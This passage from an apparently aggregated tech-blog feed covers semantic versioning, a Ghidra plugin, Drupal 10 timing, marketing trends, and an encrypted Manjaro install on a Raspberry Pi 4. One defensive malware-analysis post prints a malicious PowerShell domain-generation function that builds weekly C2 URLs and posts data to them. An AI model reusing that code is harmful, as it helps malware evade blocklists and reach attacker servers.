It is also important in case you hire me: that way you at least know what this nag will keep telling everyone in your organization as advice on the subject.

I do this mainly because I have quite a bit of experience with what does not work (that above all) and also with what does work. It has struck me that a great deal is attempted with exactly the things I have experience with and that I know do not work.

Oh well. Every project manager wants to prove that he or she can manage the thing that has been proven not to work. In itself that is fine; as a freelancer I simply bill more, and for longer, out of their project budget. But nevertheless I will always give the following advice:

They might be better off using semantic versioning (semver) for their version numbers. That makes it easier for other techies to follow:

0.0.z means it has not really been released yet, but is still fully in development. Those z increments are incremental steps for the developers themselves.

0.y.z means exactly the same, but the developers have started practicing versioning. You could also say that every y increment means a test has taken place.

1.0.0 means that people outside the development and test team can take the product into use. That it has been tested. That it works. That it is stable.

1.0.1 means that there was a single bugfix on 1.0.0 and that only that bugfix is included.

1.0.2 means that two such bugfixes have been done, after 1.0.1 was released.

1.1.0 means that one extra feature has been added to 1.0.0.

1.1.1 means that one extra feature has been added to 1.0.0 and that there was a bug in that feature. Or that there was an old problem in 1.0.0 which has now been fixed. But in that case a 1.0.3 is released alongside the 1.1.1. That 1.0.3 does not have the extra feature of 1.1.0, but it does have the fix that 1.1.1 has, backported to 1.0.0 (and in fact to 1.0.2).

2.0.0 means that something changed in the 1.y.z series that can break projects depending on it, e.g. a breaking API change (or a breaking ABI). Or something was removed. There has been a big change.

2.0.1 means that one bug has been fixed in 2.0.0. 2.1.0 means one feature has been added to 2.0.z.
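The numbering rules above boil down to comparing and bumping integer triples. A minimal Python sketch of that idea (my own illustration, not part of the original post; the names parse and bump are made up):

```python
def parse(version: str) -> tuple:
    """Split a 'major.minor.patch' string into a comparable tuple of ints."""
    major, minor, patch = (int(part) for part in version.split("."))
    return (major, minor, patch)

def bump(version: str, kind: str) -> str:
    """Return the next version number:
    'major' for a breaking change, 'minor' for a new backwards-compatible
    feature, 'patch' for a bugfix-only release."""
    major, minor, patch = parse(version)
    if kind == "major":
        return f"{major + 1}.0.0"
    if kind == "minor":
        return f"{major}.{minor + 1}.0"
    if kind == "patch":
        return f"{major}.{minor}.{patch + 1}"
    raise ValueError(f"unknown bump kind: {kind}")
```

Tuple comparison also shows why plain string comparison is wrong: "1.10.0" sorts before "1.9.9" as a string, but parse("1.10.0") correctly compares as newer.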

If you then want to keep track of all of this neatly in a version control system, where you can compare and retrieve the changes commit by commit, branch by branch, version by version and author by author, for any kind of document, you use gitflow.

July 16, 2020

Ghidra is a very nice disassembler developed by the NSA. When it was released, the tool became very popular in the security community thanks to its power and its huge list of features (features that some competitors only include with extra licenses – like the pseudo-code generator). Ghidra is also the default disassembler used in the SANS FOR610 training (reverse engineering and malware analysis).

The idea behind this plugin is to avoid losing time with the basic analysis of the sample and to focus on interesting code blocks. The plugin uses the Intezer’s API to collect information about the sample (it must have been submitted to the Intezer’s sandbox first). Then, the Ghidra plugin will provide you a list of functions identified as shared with other malware samples or tools.

Just browse the functions identified as “reused” and you can jump directly into the code to see what they do. This is also a great way to learn how malware behaves. In the following example, you can find a classic set of API calls to read a configuration from the resource in the PE file:

  • FindResource()
  • LoadResource()
  • LockResource()
  • SizeOfResource()

I had some issues installing the plugin on my Ubuntu 18.04-LTS VM that I use to run my Ghidra setup. So, I’d like to share some setup steps with you.

There is a problem with the Python requests module installed in Ubuntu (the official package). I had to remove the official module (2.18.4) and install an older version via PIP:

root@ubuntu:/# dpkg -r python-requests
root@ubuntu:/# pip install requests==2.7.0

(Note that you could have some dependencies with the python-requests package, be careful when removing it!)

The next step is to add the local repository of Python modules to the plugin script, so the plugin can find the modules installed via PIP (the dist-packages path below is where PIP puts them on Ubuntu; adjust it for your system):

if os.name == "posix":
    sys.path.append("/usr/local/lib/python2.7/dist-packages")

Then, the plugin will work smoothly! Happy reversing!

The post Detecting Code ReUse in Ghidra With Intezer’s Plugin appeared first on /dev/random.

July 15, 2020

We are targeting to release Drupal 10 around June 2022. That is less than two years from the day of this post.
A timeline showing that Drupal 10 is targeted for June 2022 because Symfony 4 is end-of-life in November 2023.

Why June 2022, you ask?

Drupal 9's biggest dependency is Symfony 4, which has an end-of-life date in November 2023. This means that after November 2023, security bugs in Symfony 4 will not get fixed. Drupal has to adopt Symfony 5 (or later) and end-of-life Drupal 9 no later than November 2023.

For security purposes, all Drupal 9 users will need to upgrade to Drupal 10 by November 2023. We like to give site owners at least one year to upgrade from Drupal 9 to Drupal 10, therefore we are targeting Drupal 10 to be released in June 2022.

Will the upgrade to Drupal 10 be easy?

Yes, it will be easy, and here is why.

New functionality for Drupal 10 is actually added to Drupal 9 releases. This means module developers can start adopting any new APIs right away. Along the way, we deprecate old functionality but keep backwards compatibility. Once we are ready to release Drupal 10, we remove all deprecated code. Removing deprecated code breaks backwards compatibility, but because module developers had a chance to stay up to date with API changes, the upgrade to Drupal 10 should be easy.

If that makes your head spin, think of it this way: Drupal 10 is identical to the last version of Drupal 9, with its deprecations removed. Because of that, there should be no last-minute, big or unexpected changes.
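The deprecate-then-remove pattern itself is language-agnostic. Here is a hedged sketch in Python (purely illustrative — Drupal is written in PHP and uses @deprecated annotations with trigger_error(); the helper names below are invented):

```python
import warnings

def new_helper(value):
    """The replacement API, introduced during the 9.x cycle."""
    return value * 2

def old_helper(value):
    """Deprecated during 9.x, removed entirely in the 10.0.0 release.

    Until removal it keeps working by delegating to the new API,
    so module developers can migrate at their own pace.
    """
    warnings.warn(
        "old_helper() is deprecated, use new_helper() instead",
        DeprecationWarning,
        stacklevel=2,
    )
    return new_helper(value)
```

Callers of old_helper() keep working (backwards compatibility), the deprecation warning tells module developers what to change, and deleting old_helper() later is the only "breaking" step left for the major release.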

We used this approach for Drupal 9, and it was successful: 95 of the top 100 contributed modules were ready the day Drupal 9.0.0 was released. We know from Drupal 9 that this approach to upgrades works, and we'll continue to refine it going forward.

July 14, 2020

DGA (“Domain Generation Algorithm”) is a technique implemented in some malware families to defeat defenders and to make the generation of IOCs (and their usage – for example to implement block lists) more difficult. When a piece of malware has to contact a C2 server, it uses domain names or IP addresses. Once the malicious code is analyzed, it’s easy to build the list of domains/IPs used and to ask the network team to block access to these network resources. With a DGA, the list of domain names is generated based on some criteria, and the attacker just has to register the newly generated domain to move the C2 infrastructure somewhere else… It is a great cat & mouse game!

I found a malicious PowerShell script that implements a simple DGA. Here is the code:

function xfyucaesbv( $etdtyefbg ){
  $ubezabcvwd = "";
  "ge","6h","sp","FT","4H","fW","mP" | %{ $ubezabcvwd += ","+"http://"+ ( [Convert]::ToBase64String( [System.Text.Encoding]::UTF8.GetBytes( $_+ $(Get-Date -UFormat "%y%m%V") ) ).toLower() ) +".top/"; };
  $ubezabcvwd.split(",") | %{
    if( !$myurlpost ) {
      $myurlpost = $_ -replace "=", "";
      if(!(sendpost2($etdtyefbg + "&domen=$myurlpost"))) {
        $myurlpost = $false;
      }
      Start-Sleep -s 5;
    }
  }
  if( $etdtyefbg -match "status=register" ){
    return "ok";
  } else {
    return $myurlpost;
  }
}

The most interesting line is this one:

PS C:\Users\REM> "ge","6h","sp","FT","4H","fW","mP" | %{ $ubezabcvwd += ","+"http://"+ ( [Convert]::ToBase64String( [System.Text.Encoding]::UTF8.GetBytes( $_+ $(Get-Date -UFormat "%y%m%V") ) ).toLower() ) +".top/"; };

The first hostname is hardcoded but others are generated by a concatenation of one string (out of the array) with a timestamp. The string is Base64 encoded and padding is removed if present. Example:

base64("ge" + "200729") = "z2uymda3mjk="

The fact that the timestamp is based on ‘%V’ (which indicates the number of the current ISO week, 01-53) is a good indicator of a DGA: a fresh set of domains is generated every week.
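For hunting purposes, the generation scheme can be replicated in a few lines of Python (a sketch: the seed list and the .top TLD are copied from the sample above, the function name dga_domains is mine):

```python
import base64
from datetime import date

# Seed strings hardcoded in the malicious PowerShell script.
SEEDS = ("ge", "6h", "sp", "FT", "4H", "fW", "mP")

def dga_domains(day: date) -> list:
    """Generate the candidate C2 domains for the week containing 'day'.

    The timestamp mimics Get-Date -UFormat "%y%m%V":
    two-digit year, two-digit month, two-digit ISO week number.
    """
    stamp = day.strftime("%y%m") + f"{day.isocalendar()[1]:02d}"
    domains = []
    for seed in SEEDS:
        # Base64-encode seed+timestamp, lowercase it, strip the '=' padding.
        token = base64.b64encode((seed + stamp).encode()).decode().lower()
        domains.append("http://" + token.rstrip("=") + ".top/")
    return domains
```

Feeding it a date in week 29 of 2020 reproduces the worked example above ("ge" + "200729" → z2uymda3mjk), and iterating over future weeks yields the domains to watch in hunting rules.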

I tried to resolve the domain names from the list above but none of them is registered right now. I generated domains for the next two months and I’ve added them to my hunting rules:

I’ll keep an eye on them!

The post Simple DGA Spotted in a Malicious PowerShell appeared first on /dev/random.

Today, Acquia announced the launch of its Open Digital Experience Platform, a single platform to build websites and applications, and run data-driven marketing campaigns across channels. As a part of the launch, I wrote a piece for Digiday on the impact COVID-19 is having on digital transformation. Even though many organizations are under pressure to rapidly transition their operations online, the changes they make now can have a positive impact for years to come. Below is the full text of the article.

Over the past few years, we've seen rapid innovation in many parts of the consumer world. Brands build pop-up stores overnight to test new retail, product, and marketing concepts. The same thing is happening digitally, driven by COVID-19. Businesses need to operate on compressed timelines, and "pop-up" new digital-first businesses (or as TechCrunch calls it, a flash digital transformation.)

In the past, these efforts would have taken years. This period of rapid change has certainly been difficult for many organizations. However, many of the changes organizations have made in the first half of this year will have a big impact for years to come.

One example of a brand that adapted its digital strategy due to COVID-19 is King Arthur Flour, the oldest flour company in America. The pandemic resulted in a surge of people baking at home. No longer able to rely on brick-and-mortar sales, King Arthur Flour's digital team drove demand online. They published new celebrity baking series and other creative, relevant content on their site. As a result, their sales increased 200 percent year-over-year, and website sessions spiked by 260 percent.

Other brands can be just as successful at flash transformation if they keep an eye on the three biggest trends driving it.

Trend 1: Experience wins, and requires intelligent use of data

Both a taxi and an Uber or Lyft can get you from point A to B. At the core, they are the same product. But in practice, the Uber or Lyft experience wins — at least in Boston where I live and taxis are notoriously bad.

Both Uber and Lyft rely on technology to deliver a superior customer experience. Every aspect of their customer experience is personalized, including their mobile applications, emails, text messages, safety features, and more.

For years, the promise of a personalized customer experience has remained elusive, only available to those who can make large engineering investments (like Uber or Lyft). Today, any organization can deliver great technology-driven customer experiences. Open Source has democratized the building of those. However, personalization remains hard. It requires that organizations get a handle on their customer data, which isn't an easy task and not something that is solved by Open Source.

Only when you use data to understand your customers' preferences and intentions can you deliver a truly relevant experience. In difficult economic times, relevant experiences help businesses stand out and drive much-needed sales.

Trend 2: The rise of the technical marketer

Marketers have become increasingly reliant on technology to drive customer experiences. Twenty years ago, a web content management system was a stand-alone application run by IT. Today, content management is deeply integrated in the marketing technology stack and primarily operated by marketing.

It's not unusual for an ambitious website to have five or more connections into other systems. Marketing technology expert Scott Brinker counted over 8,000 marketing technology vendors in 2020, a 13.6 percent increase over 2019.

A technical marketer knows how to navigate this landscape to choose the best tools for their organization. For technical marketers, it's essential to have the right platform to integrate the tools and data sources needed to optimize their customers' experiences. The rise of that technical marketer has enabled a new relationship and partnership between marketing and IT.

Trend 3: Openness

Until recently, the idea of "open" technology was a hard sell to marketers. On the other hand, developers have embraced open APIs, Open Source, and connectors for years.

More and more, marketers find themselves road-blocked by closed systems. When a marketing automation system can't talk to other data sources, it can be impossible to implement effective personalization. When an email marketing tool only draws upon the data contained within its own system, it misses out on the data that is collected by a separate web analytics tool. Examples of these types of silos across the traditional marketing stack abound.

Without the ability to integrate different marketing tools and the data contained within them, customer experiences will continue to be disjointed and far from personal. In fact, research shows that 60 percent of customers are frustrated with brands' ability to predict their needs, and think they aren't doing an effective job of using personalization. To address these frustrations, openness and interconnectivity between technologies needs to become a marketing must-have, instead of a nice-to-have.

A new age of resilience

It's been impressive to see how resilient organizations and people have been at adapting so rapidly. This adaptation has been essential to business survival. Fortunately, the changes made under pressure could be the key to succeeding as more of the world becomes permanently digital, enabling the kinds of digital transformations that organizations have sought for years.

July 12, 2020

The Raspberry PI has become more and more powerful in the recent years, maybe too powerful to be a “maker board”. The higher CPU power and availability of more memory - up to 8GB - makes it more suitable for home server usage.

The latest firmware (EEPROM) enables booting from a USB device. To enable USB boot the EEPROM on the raspberry needs to be updated to the latest version and the bootloader that comes with the operating system - the start*.elf, etc files on the boot filesystem - needs to support it.

I always try to use filesystem encryption. You’ll find my journey to install GNU/Linux on an encrypted filesystem below.

64 Bits operating systems

The Raspberry PI 4 has a 64-bit CPU, but the default operating system for the Raspberry PI - Raspberry Pi OS (previously called Raspbian) - is still 32 bits. To take full advantage of the 64-bit CPU, a 64-bit operating system is required.

You’ll find an overview of GNU/Linux distributions for the RPI4 below.

  • Raspberry PI OS

    Raspberry PI OS is the default operating system for the Raspberry Pi. The operating system is 32 bits.

    There is a beta version with 64-bit support available.

  • Ubuntu

    Ubuntu for the Raspberry PI has 64-bit support, but the boot process isn’t fully compatible with USB boot: the u-boot bootloader hasn’t been updated yet to support it.

  • Kali Linux

    Kali Linux is another 64-bit operating system for the Raspberry Pi. Its bootloader isn’t updated enough to support USB boot either.

  • Arch Linux ARM

    Arch Linux ARM has an install image for the Raspberry PI 4, but the default install image is still 32 bits. Arch Linux ARM has 64-bit support, so you could build your own image with the 64-bit packages and a custom kernel.

  • Manjaro

    Manjaro is based on Arch Linux and has 64-bit support for the Raspberry PI. Manjaro is a rolling distribution, and its boot loader is up to date enough to support USB boot.

  • Other

    The list above covers the GNU/Linux distributions that I considered for my Raspberry PI 4. There are - as always - other options. The distributions that don’t support booting from a USB device will probably support it soon.

I was looking for a GNU/Linux distribution with 64 bits support and USB boot support and went with Manjaro.

The installation process to install Manjaro on an encrypted filesystem is similar to the installation on an x86_64 system running Archlinux. See my previous blog posts: Install Arch on an encrypted btrfs partition and Install Parabola GNU/Linux on an Encrypted btrfs logical volume.

USB boot

To enable the raspberry pi 4 to boot from USB, you need to update your firmware. The boot loader also needs to be updated to enable booting from a USB device.

Get the latest firmware

Manjaro didn’t include the latest stable firmware to enable USB boot, so I used the 64 bits beta Raspberry PI OS to update the firmware.

Update Raspberry PI OS to get the latest firmware.

pi@raspberrypi:~ $ sudo apt-get update
Hit:1 buster InRelease
Hit:2 buster InRelease
Hit:3 buster/updates InRelease
Hit:4 buster-updates InRelease
Reading package lists... Done
pi@raspberrypi:~ $ sudo apt-get full-upgrade
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Calculating upgrade... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
pi@raspberrypi:~ $ 

Verify that the latest firmware is available.

The latest stable bootloader is located at /lib/firmware/raspberrypi/bootloader/stable.

pi@raspberrypi:~ $ cd /lib/firmware/raspberrypi/
pi@raspberrypi:/lib/firmware/raspberrypi $ ls
pi@raspberrypi:/lib/firmware/raspberrypi $ cd bootloader/stable/
pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ 

Verify that the pieeprom > 2020-06-xx is available.

pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ ls -l
total 1220
-rw-r--r-- 1 root root 524288 Apr 23 17:53 pieeprom-2020-04-16.bin
-rw-r--r-- 1 root root 524288 Jun 17 11:15 pieeprom-2020-06-15.bin
-rw-r--r-- 1 root root  98148 Jun 17 11:15 recovery.bin
-rw-r--r-- 1 root root  98904 Feb 28 15:41 vl805-000137ad.bin
pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ 

Get the current version

Execute vcgencmd bootloader_version to get the current firmware version.

Please note that I already updated the firmware in the output below.

pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ vcgencmd bootloader_version
Jun 15 2020 14:36:19
version c302dea096cc79f102cec12aeeb51abf392bd781 (release)
timestamp 1592228179


Install the new EEPROM image with rpi-eeprom-update:

pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ sudo rpi-eeprom-update -d -f  ./pieeprom-2020-06-15.bin
BCM2711 detected
VL805 firmware in bootloader EEPROM
BOOTFS /boot
*** INSTALLING ./pieeprom-2020-06-15.bin  ***
BOOTFS /boot
EEPROM update pending. Please reboot to apply the update.
pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ 


pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ sudo reboot

Verify the version again.

pi@raspberrypi:~ $ vcgencmd bootloader_version
Jun 15 2020 14:36:19
version c302dea096cc79f102cec12aeeb51abf392bd781 (release)
timestamp 1592228179
pi@raspberrypi:~ $ 

The Raspberry PI is ready to boot from USB.

Install Manjaro on an encrypted filesystem

Manjaro runs an install script after the RPI is booted to complete the installation.

We have two options:

  • Boot the PI from the standard non-encrypted image and move the installation to an encrypted filesystem afterwards.
  • Extract the installation image and move the content to an encrypted filesystem directly.

You’ll find my journey through the second option below. The host system used to extract/install the image is an x86_64 system running Archlinux.

Download and copy

Download and verify the Manjaro image from:

Copy the image to keep the original intact.

[root@vicky manjaro]# cp Manjaro-ARM-xfce-rpi4-20.06.img image

Create tarball

Verify the image

Verify the image layout with fdisk -l.

[root@vicky manjaro]# fdisk -l image
Disk image: 4.69 GiB, 5017436160 bytes, 9799680 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x090a113e

Device     Boot  Start     End Sectors   Size Id Type
image1           62500  500000  437501 213.6M  c W95 FAT32 (LBA)
image2          500001 9799679 9299679   4.4G 83 Linux
[root@vicky manjaro]# 

We’ll use kpartx to map the partitions in the image so we can mount them. kpartx is part of the multipath-tools package.

Map the partitions in the image with kpartx -av: the “-a” option adds the image, “-v” makes it verbose so we can see where the partitions are mapped to.

[root@vicky manjaro]# kpartx -av image
add map loop1p1 (254:10): 0 437501 linear 7:1 62500
add map loop1p2 (254:11): 0 9299679 linear 7:1 500001
[root@vicky manjaro]#

Create the destination directory.

[root@vicky manjaro]# mkdir /mnt/chroot

Mount the partitions.

[root@vicky manjaro]# mount /dev/mapper/loop1p2 /mnt/chroot
[root@vicky manjaro]# mount /dev/mapper/loop1p1 /mnt/chroot/boot
[root@vicky manjaro]#

Create the tarball.

[root@vicky manjaro]# cd /mnt/chroot/
[root@vicky chroot]# tar czvpf /home/staf/Downloads/isos/manjaro/Manjaro-ARM-xfce-rpi4-20.06.tgz .


[root@vicky ~]# umount /mnt/chroot/boot 
[root@vicky ~]# umount /mnt/chroot
[root@vicky ~]# cd /home/staf/Downloads/isos/manjaro/
[root@vicky manjaro]# kpartx -d image
loop deleted : /dev/loop1
[root@vicky manjaro]# 

Partition and create filesystems


Partition your hard disk; delete all existing partitions first if there are any on the disk.

I’ll create 3 partitions on my hard disk:

  • a boot partition of 500MB (type c, ‘W95 FAT32 (LBA)’)
  • a root partition of 50G
  • the rest
[root@vicky ~]# fdisk /dev/sdh

Welcome to fdisk (util-linux 2.35.2).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.

Device does not contain a recognized partition table.
Created a new DOS disklabel with disk identifier 0x49887ce7.

Command (m for help): n
Partition type
   p   primary (0 primary, 0 extended, 4 free)
   e   extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1): 
First sector (2048-976773167, default 2048): 
Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-976773167, default 976773167): +500M

Created a new partition 1 of type 'Linux' and of size 500 MiB.

Command (m for help): n
Partition type
   p   primary (1 primary, 0 extended, 3 free)
   e   extended (container for logical partitions)
Select (default p): p
Partition number (2-4, default 2): 2
First sector (1026048-976773167, default 1026048): 
Last sector, +/-sectors or +/-size{K,M,G,T,P} (1026048-976773167, default 976773167): +50G

Created a new partition 2 of type 'Linux' and of size 50 GiB.

Command (m for help): n
Partition type
   p   primary (2 primary, 0 extended, 2 free)
   e   extended (container for logical partitions)
Select (default p): p
Partition number (3,4, default 3): 
First sector (105883648-976773167, default 105883648): 
Last sector, +/-sectors or +/-size{K,M,G,T,P} (105883648-976773167, default 976773167): 

Created a new partition 3 of type 'Linux' and of size 415.3 GiB.

Command (m for help): t
Partition number (1-3, default 3): 1
Hex code (type L to list all codes): c

Changed type of partition 'Linux' to 'W95 FAT32 (LBA)'.

Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.

Create the boot file system

The Raspberry Pi uses a FAT filesystem for the boot partition.

[root@vicky ~]# mkfs.vfat /dev/sdh1
mkfs.fat 4.1 (2017-01-24)
[root@vicky ~]# 

Create the root filesystem

Overwrite the root partition with random data

Because we are creating an encrypted filesystem, it’s a good idea to overwrite the partition with random data first. We’ll use badblocks for this. Another method is “dd if=/dev/urandom of=/dev/xxx”; the “dd” method produces better random data but is a lot slower.

[root@vicky ~]# badblocks -c 10240 -s -w -t random -v /dev/sdh2
Checking for bad blocks in read-write mode
From block 0 to 52428799
Testing with random pattern: done                                                 
Reading and comparing: done                                                 
Pass completed, 0 bad blocks found. (0/0/0 errors)
[root@vicky ~]# 

Encrypt the root filesystem


I booted the RPI4 from an SD card to check the encryption performance by running cryptsetup benchmark.

[root@minerva ~]# cryptsetup benchmark
# Tests are approximate using memory only (no storage IO).
PBKDF2-sha1       398395 iterations per second for 256-bit key
PBKDF2-sha256     641723 iterations per second for 256-bit key
PBKDF2-sha512     501231 iterations per second for 256-bit key
PBKDF2-ripemd160  330156 iterations per second for 256-bit key
PBKDF2-whirlpool  124356 iterations per second for 256-bit key
argon2i       4 iterations, 319214 memory, 4 parallel threads (CPUs) for 256-bit key (requested 2000 ms time)
argon2id      4 iterations, 321984 memory, 4 parallel threads (CPUs) for 256-bit key (requested 2000 ms time)
#     Algorithm |       Key |      Encryption |      Decryption
        aes-cbc        128b        23.8 MiB/s        77.7 MiB/s
    serpent-cbc        128b               N/A               N/A
    twofish-cbc        128b        55.8 MiB/s        56.2 MiB/s
        aes-cbc        256b        17.4 MiB/s        58.9 MiB/s
    serpent-cbc        256b               N/A               N/A
    twofish-cbc        256b        55.8 MiB/s        56.1 MiB/s
        aes-xts        256b        85.0 MiB/s        74.9 MiB/s
    serpent-xts        256b               N/A               N/A
    twofish-xts        256b        61.1 MiB/s        60.4 MiB/s
        aes-xts        512b        65.4 MiB/s        57.4 MiB/s
    serpent-xts        512b               N/A               N/A
    twofish-xts        512b        61.3 MiB/s        60.3 MiB/s
[root@minerva ~]# 
Create the Luks volume

The aes-xts cipher seems to have the best performance on the RPI4.

[root@vicky ~]# cryptsetup luksFormat --cipher aes-xts-plain64 --key-size 256 --hash sha256 --use-random /dev/sdh2

This will overwrite data on /dev/sdh2 irrevocably.

Are you sure? (Type 'yes' in capital letters): YES
Enter passphrase for /dev/sdh2: 
Verify passphrase: 
WARNING: Locking directory /run/cryptsetup is missing!
[root@vicky ~]# 
Open the Luks volume
[root@vicky ~]# cryptsetup luksOpen /dev/sdh2 cryptroot
Enter passphrase for /dev/sdh2: 
[root@vicky ~]# 

Create the root filesystem

[root@vicky ~]# mkfs.ext4 /dev/mapper/cryptroot
mke2fs 1.45.6 (20-Mar-2020)
Creating filesystem with 13103104 4k blocks and 3276800 inodes
Filesystem UUID: 557677f1-9705-4beb-8c8b-e36c552730f3
Superblock backups stored on blocks: 
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208, 
	4096000, 7962624, 11239424

Allocating group tables: done                            
Writing inode tables: done                            
Creating journal (65536 blocks): done
Writing superblocks and filesystem accounting information: done   

[root@vicky ~]# 

Mount and extract

Mount the root filesystem.

[root@vicky ~]# mount /dev/mapper/cryptroot /mnt/chroot
[root@vicky ~]# mkdir -p /mnt/chroot/boot
[root@vicky ~]# mount /dev/sdh1 /mnt/chroot/boot
[root@vicky ~]# 

And extract the tarball.

[root@vicky manjaro]# cd /home/staf/Downloads/isos/manjaro/
[root@vicky manjaro]# tar xzvf Manjaro-ARM-xfce-rpi4-20.06.tgz -C /mnt/chroot/
[root@vicky manjaro]# sync


To continue the setup we need to boot or chroot into the operating system. It is possible to run ARM64 code on an x86_64 system with qemu, which will emulate an ARM64 CPU.

Install qemu-arm-static

Install the qemu-arm-static package. It is not in the main Arch Linux repositories, but it is available in the AUR.

[staf@vicky ~]$ yay -S qemu-arm-static 

copy qemu-aarch64-static

Copy the static qemu binary into the chroot. For an aarch64 chroot this is qemu-aarch64-static (the qemu-arm-static AUR package ships the static emulators for all ARM targets).

[root@vicky manjaro]# cp /usr/bin/qemu-aarch64-static /mnt/chroot/usr/bin/
[root@vicky manjaro]# 

mount proc & co

To be able to run programs in the chroot we need the proc, sys and dev filesystems mapped into the chroot.

[root@vicky ~]# mount -t proc none /mnt/chroot/proc
[root@vicky ~]# mount -t sysfs none /mnt/chroot/sys
[root@vicky ~]# mount -o bind /dev /mnt/chroot/dev
[root@vicky ~]# mount -o bind /dev/pts /mnt/chroot/dev/pts
[root@vicky ~]# 


Chroot into the ARM64 installation.

LANG=C chroot /mnt/chroot/

Set the PATH.

[root@vicky /]# export PATH=/sbin:/bin:/usr/sbin:/usr/bin

And verify that we are running aarch64.

[root@vicky /]# uname -a
Linux vicky 5.6.19.a-1-hardened #1 SMP PREEMPT Sat, 20 Jun 2020 15:16:50 +0000 aarch64 GNU/Linux
[root@vicky /]# 

Update and install vi

Update all packages to the latest version.

[root@vicky /]# pacman -Syu

We need an editor.

[root@vicky /]# pacman -S vi
resolving dependencies...
looking for conflicting packages...

Packages (1) vi-1:070224-4

Total Download Size:   0.15 MiB
Total Installed Size:  0.37 MiB

:: Proceed with installation? [Y/n] y
:: Retrieving packages...
 vi-1:070224-4-aarch64                         157.4 KiB  2.56 MiB/s 00:00 [##########################################] 100%
(1/1) checking keys in keyring                                             [##########################################] 100%
(1/1) checking package integrity                                           [##########################################] 100%
(1/1) loading package files                                                [##########################################] 100%
(1/1) checking for file conflicts                                          [##########################################] 100%
(1/1) checking available disk space                                        [##########################################] 100%
:: Processing package changes...
(1/1) installing vi                                                        [##########################################] 100%
Optional dependencies for vi
    s-nail: used by the preserve command for notification
:: Running post-transaction hooks...
(1/1) Arming ConditionNeedsUpdate...
[root@vicky /]# 



Add encrypt to HOOKS before filesystems in /etc/mkinitcpio.conf.

[root@vicky /]#  vi /etc/mkinitcpio.conf
HOOKS=(base udev autodetect modconf block encrypt filesystems keyboard fsck)

Create the boot image

[root@vicky /]# ls -l /etc/mkinitcpio.d/
total 4
-rw-r--r-- 1 root root 246 Jun 11 11:06 linux-rpi4.preset
[root@vicky /]# 
[root@vicky /]# mkinitcpio -p linux-rpi4
==> Building image from preset: /etc/mkinitcpio.d/linux-rpi4.preset: 'default'
  -> -k 4.19.127-1-MANJARO-ARM -c /etc/mkinitcpio.conf -g /boot/initramfs-linux.img
==> Starting build: 4.19.127-1-MANJARO-ARM
  -> Running build hook: [base]
  -> Running build hook: [udev]
  -> Running build hook: [autodetect]
  -> Running build hook: [modconf]
  -> Running build hook: [block]
  -> Running build hook: [encrypt]
==> ERROR: module not found: `dm_integrity'
  -> Running build hook: [filesystems]
  -> Running build hook: [keyboard]
  -> Running build hook: [fsck]
==> Generating module dependencies
==> Creating gzip-compressed initcpio image: /boot/initramfs-linux.img
==> WARNING: errors were encountered during the build. The image may not be complete.
[root@vicky /]#

update boot settings…

Get the UUID for the boot and the root partition.

[root@vicky boot]# ls -l /dev/disk/by-uuid/ | grep -i sdh
lrwxrwxrwx 1 root root 12 Jul  8 11:42 xxxx-xxxx -> ../../sdh1
lrwxrwxrwx 1 root root 12 Jul  8 12:44 xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx -> ../../sdh2
[root@vicky boot]# 

The Raspberry Pi uses cmdline.txt to specify the boot options.

[root@vicky ~]# cd /boot
[root@vicky boot]# 
[root@vicky boot]# cp cmdline.txt cmdline.txt_org
[root@vicky boot]# vi cmdline.txt
[root@vicky boot]# 
cryptdevice=/dev/disk/by-uuid/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx1:cryptroot root=/dev/mapper/cryptroot rw rootwait console=ttyAMA0,115200 console=tty1 selinux=0 plymouth.enable=0 smsc95xx.turbo_mode=N dwc_otg.lpm_enable=0 kgdboc=ttyAMA0,115200 elevator=noop snd-bcm2835.enable_compat


Also update /etc/fstab so the boot partition is mounted by its UUID.

[root@vicky etc]# cp fstab fstab_org
[root@vicky etc]# vi fstab
[root@vicky etc]# 
# Static information about the filesystems.
# See fstab(5) for details.

# <file system> <dir> <type> <options> <dump> <pass>
UUID=xxxx-xxxx  /boot   vfat    defaults        0       0

Finish your setup

Set the root password.

[root@vicky etc]# passwd

Set the timezone.

[root@vicky etc]# ln -s /usr/share/zoneinfo/Europe/Brussels /etc/localtime

Generate the required locales.

[root@vicky etc]# vi /etc/locale.gen 
[root@vicky etc]# locale-gen

Set the hostname.

[root@vicky etc]# vi /etc/hostname

clean up

Exit chroot

[root@vicky etc]# exit
[root@vicky ~]# uname -a
Linux vicky 5.6.19.a-1-hardened #1 SMP PREEMPT Sat, 20 Jun 2020 15:16:50 +0000 x86_64 GNU/Linux
[root@vicky ~]# 

Make sure that there are no processes still running from the chroot.

[root@vicky ~]# ps aux | grep -i qemu
root      160666  0.0  0.1 323228 35468 ?        Ssl  16:50   0:00 /usr/bin/qemu-aarch64-static /usr/bin/gpg-agent --homedir /etc/pacman.d/gnupg --use-standard-socket --daemon
root      203274  0.0  0.0   6812  2188 pts/1    S+   17:14   0:00 grep -i qemu
[root@vicky ~]# 

Kill the processes from the chroot.

[root@vicky ~]# kill 160666
[root@vicky ~]# 

Umount the chroot filesystems. On a recent util-linux, “umount -R /mnt/chroot” unmounts them all recursively; otherwise retry plain umount until the targets are no longer busy.

[root@vicky manjaro]# mount | grep -i chroot | awk '{print $3}'
[root@vicky manjaro]# 
[root@vicky manjaro]#  mount | grep -i chroot | awk '{print $3}' | xargs -n1 umount 
umount: /mnt/chroot: target is busy.
umount: /mnt/chroot/dev: target is busy.
